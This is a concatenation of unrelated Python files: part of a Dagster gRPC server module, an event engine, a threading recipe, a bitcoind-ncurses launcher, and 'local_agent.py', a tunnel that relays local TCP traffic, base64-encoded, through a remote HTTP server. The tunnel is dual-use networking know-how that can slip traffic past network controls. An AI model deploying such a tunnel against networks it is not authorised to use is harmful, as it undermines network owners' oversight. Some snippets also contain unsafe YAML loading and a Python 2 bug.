# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
start_time = time.time()
last_error = None
while True:
try:
client.ping("")
return
except DagsterUserCodeUnreachableError:
last_error = serializable_error_info_from_exc_info(sys.exc_info())
if time.time() - start_time > timeout:
raise Exception(
f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
)
if server_process.poll() != None:
raise Exception(
f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
)
sleep(0.1)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ ["--lazy-load-user-code"]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
+ (["--log-level", "WARNING"]) # don't log INFO messages for automatically spun up servers
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
from dagster.grpc.client import DagsterGrpcClient
client = DagsterGrpcClient(
port=port,
socket=socket,
host="localhost",
)
try:
wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
self.port = None
self.socket = None
self.server_process = None
self.loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.int_param(startup_timeout, "startup_timeout")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
|
local_agent.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Email: chenwx716@139.com
# DateTime: 2018-11-22 16:24:44
__author__ = "chenwx"
import random
import time
import socket
import base64
import requests
import json
import hashlib
import threading
import os
import logging
import yaml
from pathlib import Path
streams = [None, None]
link_yes = None
debug = 1
sessice_id = None
crypt = True
class My_log(object):
"""docstring for My_log
日志服务的基类
"""
def __init__(self, log_file=None, level=logging.WARNING):
super(My_log, self).__init__()
self.logger = logging.getLogger()
if not self.logger.handlers:
log_dir = os.path.dirname(log_file)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
typea = self.logger.setLevel(level)
typea = logging.FileHandler(log_file)
formatter = logging.Formatter(
"[%(asctime)s]:%(levelname)s:%(filename)s:%(funcName)s:%(lineno)d : %(message)s"
)
typea.setFormatter(formatter)
self.logger.addHandler(typea)
def get_log(self):
return self.logger
def MyEncryption(signal, reqtype, sessice_id, data):
pass
def MyDecrypt(data):
pass
def create_key():
time_vlue = int(time.time())
return hashlib.sha1(
str(((time_vlue * 6.9) + 34241258) * 2.4).encode("utf8")
).hexdigest()
def req_http_server(sessice_id, signal=2, data=None, resdata=None):
json_headers = {"content-type": "application/json"}
url = conf_data.get("http_server_url")
if not data:
data = b"1"
if crypt:
base64_data = base64.b64encode(data).decode()
value = {
"signal": signal,
"reqdata": {
"sessice_id": sessice_id,
"type": "tx1",
"data": base64_data,
"verifycode": create_key(),
},
}
# hashlib.sha1(base64_data.encode("utf8")).hexdigest()
else:
value = {
"signal": signal,
"reqdata": {
"sessice_id": sessice_id,
"type": "tx1",
"data": data,
"verifycode": 0,
},
}
try:
r = requests.post(url, data=json.dumps(value), headers=json_headers)
except Exception as e:
work_log.error("link remote http server error")
work_log.error(str(e))
raise e
if resdata:
# new_data = r.content
# new_data = r.text
base64_data = r.text
new_data = base64.b64decode(base64_data)
r.close()
# work_log.debug('sessice_id: %d , req_http_data: %s' % (sessice_id, str(new_data)))
work_log.debug(
"sessice_id: %d , req_http_data len: %d" % (sessice_id, len(new_data))
)
return new_data
else:
r.close()
def _remote_server():
global link_yes, sessice_id
while 1:
if not link_yes or not sessice_id:
time.sleep(1)
continue
try:
work_log.debug("sessice_id: %d , signal: %d" % (sessice_id, 2))
new_data = req_http_server(sessice_id, signal=2, data=None, resdata=True)
except Exception as e:
work_log.error("getmess error sleep 10s")
work_log.error(str(e))
time.sleep(10)
continue
if new_data:
work_log.debug("remote get mess data to s0 buff len: %d" % len(new_data))
# s0 = _get_another_stream(0) # 获取另一端流对象
s0 = streams[0]
if s0:
s0.sendall(new_data)
else:
work_log.info("remote get mess: recv data None")
# time.sleep(1)
s0 = streams[0]
if s0:
s0.close()
link_yes = None
work_log.info("_remote_server close _local_server connect")
continue
def _local_server():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_ip = conf_data.get("agent").get("listen_ip")
listen_port = conf_data.get("agent").get("listen_port")
server.bind((listen_ip, listen_port))
server.listen(1)
work_log.info("_local_server thread listen start")
while 1:
connection, client_addr = server.accept()
work_log.info("connect client addr: %s" % str(client_addr))
global link_yes, sessice_id
link_yes = True
sessice_id = random.randint(100000, 900000) + client_addr[1]
work_log.info("connect sessic_id: %d" % sessice_id)
streams[0] = connection # 放入本端流对象
signal = 0
try:
while 1:
work_log.debug(
"local server sessice_id: %d start recv data" % sessice_id
)
buff = connection.recv(4096)
# work_log.debug('sessice_id: %d ,buff data: %s' %(sessice_id,str(buff)))
work_log.debug(
"sessice_id: %d ,local server recv buff len: %d"
% (sessice_id, len(buff))
)
if len(buff) == 0: # 对端关闭连接,读不到数据
work_log.info("sessice_id: %d ,buff == 0 ; break" % sessice_id)
req_http_server(sessice_id, signal=3, resdata=None)
work_log.debug("sessice_id: %d , signal: %d" % (sessice_id, 3))
break
work_log.debug("sessice_id: %d , signal: %d" % (sessice_id, signal))
req_http_server(sessice_id, data=buff, signal=signal, resdata=None)
signal = 1
except Exception as e:
work_log.error(
"sessice_id: %d one connect colsed; except error: %s"
% (sessice_id, str(e))
)
if not link_yes:
work_log.info(
"_local_server sessice_id: %d link_yes = None, continue, not close link"
% sessice_id
)
sessice_id = None
continue
else:
try:
connection.shutdown(socket.SHUT_RDWR)
connection.close()
streams[0] = None
link_yes = None
sessice_id = None
work_log.info("_local_server set link_yes = None, close link")
# req_http_server(sessice_id,data=None,signal=2,resdata=None)
except Exception as e:
work_log.error(
"sessice_id: %d shutdown socket error: %s" % (sessice_id, str(e))
)
sessice_id = None
work_log.debug("local server set sessid_id = None")
def main():
s1 = threading.Thread(target=_local_server)
s1.start()
s2 = threading.Thread(target=_remote_server)
s2.start()
s1.join()
s2.join()
if __name__ == "__main__":
workdir = Path(__file__).resolve().parent
global conf_data
conf_data = yaml.load(open(str(workdir / "devel.yaml"), "r").read())
logfile = workdir / conf_data.get("agent").get("log_file")
log_level = conf_data.get("agent").get("log_level")
work_log = My_log(logfile, log_level).get_log()
main()
|
eventEngine.py
|
# encoding: UTF-8
# 系统模块
from __future__ import print_function
from queue import Queue, Empty
from threading import Thread
from time import sleep
from collections import defaultdict
# 第三方模块
from qtpy.QtCore import QTimer
# 自己开发的模块
from myquant.event.eventType import *
########################################################################
class EventEngine(object):
"""
事件驱动引擎
事件驱动引擎中所有的变量都设置为了私有,这是为了防止不小心
从外部修改了这些变量的值或状态,导致bug。
变量说明
__queue:私有变量,事件队列
__active:私有变量,事件引擎开关
__thread:私有变量,事件处理线程
__timer:私有变量,计时器
__handlers:私有变量,事件处理函数字典
方法说明
__run: 私有方法,事件处理线程连续运行用
__process: 私有方法,处理事件,调用注册在引擎中的监听函数
__onTimer:私有方法,计时器固定事件间隔触发后,向事件队列中存入计时器事件
start: 公共方法,启动引擎
stop:公共方法,停止引擎
register:公共方法,向引擎中注册监听函数
unregister:公共方法,向引擎中注销监听函数
put:公共方法,向事件队列中存入新的事件
事件监听函数必须定义为输入参数仅为一个event对象,即:
函数
def func(event)
...
对象方法
def method(self, event)
...
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
self.__thread.setDaemon(True)
# 计时器,用于触发计时器事件
self.__timer = QTimer()
self.__timer.timeout.connect(self.__onTimer)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
#----------------------------------------------------------------------
def __onTimer(self):
"""向事件队列中存入计时器事件"""
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
#----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timer.start(2500)
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timer.stop()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
#----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
#----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
########################################################################
class EventEngine2(object):
"""
计时器使用python线程的事件驱动引擎
"""
# ----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target=self.__run)
# 计时器,用于触发计时器事件
self.__timer = Thread(target=self.__runTimer)
self.__timerActive = False # 计时器工作状态
self.__timerSleep = 1 # 计时器触发间隔(默认1秒)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
# ----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block=True, timeout=1) # 获取事件的阻塞时间设为1秒
# if event.type_ is not EVENT_TIMER:
print("event.type_:", event.type_)
self.__process(event)
except Empty:
pass
# ----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
# for handler in self.__handlers[event.type_]:
# handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
# ----------------------------------------------------------------------
def __runTimer(self):
"""运行在计时器线程中的循环函数"""
while self.__timerActive:
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
# 等待
sleep(self.__timerSleep)
# ----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timerActive = True
self.__timer.start()
# ----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timerActive = False
self.__timer.join()
# 等待事件处理线程退出
self.__thread.join()
# ----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
# ----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
# ----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
# ----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
# ----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
########################################################################
class Event:
"""事件对象"""
#----------------------------------------------------------------------
def __init__(self, type_=None):
"""Constructor"""
self.type_ = type_ # 事件类型
self.dict_ = {} # 字典用于保存具体的事件数据
#----------------------------------------------------------------------
def test():
"""测试函数"""
import sys
from datetime import datetime
# from qtpy.QtCore import QCoreApplication
ee = EventEngine2()
def simpletest(event):
print(u'处理每秒触发的计时器事件:{}'.format(str(datetime.now())))
def put():
while True:
print('put')
event = Event()
event.type_ = 'abc'
ee.put(event)
sleep(1.5)
def abc(event):
print('abc:',123)
# app = QCoreApplication(sys.argv)
ee.register(type_='abc', handler=abc)
# ee.registerGeneralHandler(simpletest)
ee.start()
put()
# app.exec_()
# 直接运行脚本可以进行测试
if __name__ == '__main__':
test()
|
recipe-577350.py
|
import threading
class WorkersLounge(object):
def __init__(self, total_workers_number):
"""
@param total_workers_number: the maximum number of worker threads
"""
self.total_workers_number = total_workers_number
self.waiting_place = threading.Condition()
self.work_done_event = threading.Event()
def rest(self):
"""
When a thread calls this method there are two possible options:
- either there are other active threads, in which case the current thread waits
- all other threads are already waiting, in which case they all exit
@return: True if the caller thread should go back to work
False if the caller thread should exit
"""
with self.waiting_place:
if (len(self.waiting_place._Condition__waiters) ==
self.total_workers_number-1):
# This is the last worker, and it has nothing to do
self.work_done_event.set()
self.waiting_place.notifyAll()
# Notify the caller there is no more work to do
return False
else:
# Wait for a signal
self.waiting_place.wait()
return not(self.work_done_event.isSet())
def back_to_work(self):
"""
Wake up all the waiting threads.
Should be called whenever a thread puts new input into the common source.
"""
# Wake up everybody
with self.waiting_place:
self.waiting_place.notifyAll()
if __name__ == "__main__":
# Run test code
import Queue
import time
print_lock = threading.Lock()
def sync_print(text):
with print_lock:
print text
def _thread_proc(input_queue, workers_lounge):
thread_name = threading.currentThread().name
while 1:
try:
# Attempt to get input from the common queue
input = input_queue.get(timeout=0.1)
# Do something with the input, possibly inserting more jobs
# back into the queue
sync_print("%s got input %s"%(thread_name, input))
time.sleep(1)
if (input < 5):
input_queue.put(input+1)
input_queue.put(input+1)
# Wake up any waiting thread
workers_lounge.back_to_work()
except Queue.Empty:
# The 'rest' method returns False if the thread should stop,
# and blocks until someone wakes it up
sync_print("%s is resting"%thread_name)
if (workers_lounge.rest() == False):
sync_print("%s finished working"%thread_name)
break
# Create an initial input source
input_queue = Queue.Queue()
input_queue.put(1)
input_queue.put(1)
# Run worker threads
threads_number = 5
workers_lounge = WorkersLounge(total_workers_number=threads_number)
for _i in range(threads_number):
threads.append(
threading.Thread(target=_thread_proc, args=(input_queue, workers_lounge)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
main.py
|
#!/usr/bin/env python
###############################################################################
# bitcoind-ncurses by Amphibian
# thanks to jgarzik for bitcoinrpc
# wumpus and kylemanna for configuration file parsing
# all the users for their suggestions and testing
# and of course the bitcoin dev team for that bitcoin gizmo, pretty neat stuff
###############################################################################
import multiprocessing, argparse, signal
import global_mod as g
import rpc
import interface
import config
def interrupt_signal(signal, frame):
s = {'stop': "Interrupt signal caught"}
interface_queue.put(s)
def debug(rpc_queue):
# coinbase testnet transaction for debugging
#s = {'txid': "cfb8bc436ca1d8b8b2d324a9cb2ef097281d2d8b54ba4239ce447b31b8757df2"}
# tx with 1001 inputs, 1002 outputs
s = {'txid': 'e1dc93e7d1ee2a6a13a9d54183f91a5ae944297724bee53db00a0661badc3005'}
rpc_queue.put(s)
if __name__ == '__main__':
# initialise queues
interface_queue = multiprocessing.Queue()
rpc_queue = multiprocessing.Queue()
# parse commandline arguments
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config",
help="path to config file (i.e. bitcoin.conf|litecoin.conf)",
default="bitcoin.conf")
parser.add_argument("-m", "--mode",
help="coin mode, either BTC (default), BCH, BSV, BTG, or LTC",
default="BTC")
args = parser.parse_args()
# get coin mode
try:
g.coinmode = args.mode.upper()
except:
g.coinmode = g.get_default_coinmode()
g.init_coinmode()
# parse config file
try:
cfg = config.read_file(args.config)
except IOError:
cfg = {}
s = {'stop': "configuration file [" + args.config + "] does not exist or could not be read"}
interface_queue.put(s)
# initialise interrupt signal handler (^C)
signal.signal(signal.SIGINT, interrupt_signal)
# start RPC thread
rpc_process = multiprocessing.Process(target=rpc.loop, args = (interface_queue, rpc_queue, cfg))
rpc_process.daemon = True
rpc_process.start()
#debug(rpc_queue)
# main loop
interface.main(interface_queue, rpc_queue)
# ensure RPC thread exits cleanly
rpc_process.join()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.